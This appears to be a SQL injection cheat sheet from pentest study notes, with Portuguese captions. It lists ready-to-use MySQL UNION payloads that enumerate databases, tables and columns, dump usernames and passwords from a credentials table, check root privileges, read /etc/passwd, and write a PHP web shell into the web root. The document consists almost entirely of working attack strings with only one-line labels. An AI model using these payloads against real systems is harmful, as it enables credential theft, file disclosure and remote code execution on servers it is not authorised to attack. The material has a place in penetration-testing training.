Exploitation

SELECT @@version

Impressão digital MySQL com saída de consulta

SELECT SLEEP(5)

Impressão digital MySQL sem saída

cn' UNION select 1,database(),2,3-- -

Nome do banco de dados atual

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Listar todos os bancos de dados

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

Listar todas as tabelas em um banco de dados específico

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Listar todas as colunas de uma tabela específica

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Despejar dados de uma tabela em outro banco de dados

cn' UNION SELECT 1, user(), 3, 4-- -

Encontrar usuário atual

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Descubra se o usuário tem privilégios de administrador

cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

Descubra se todos os privilégios do usuário

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Descubra quais diretórios podem ser acessados através do MySQL

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Ler arquivo local

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Escreva uma string em um arquivo local

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Escreva um web shell no diretório base da web

Last updated 12 months ago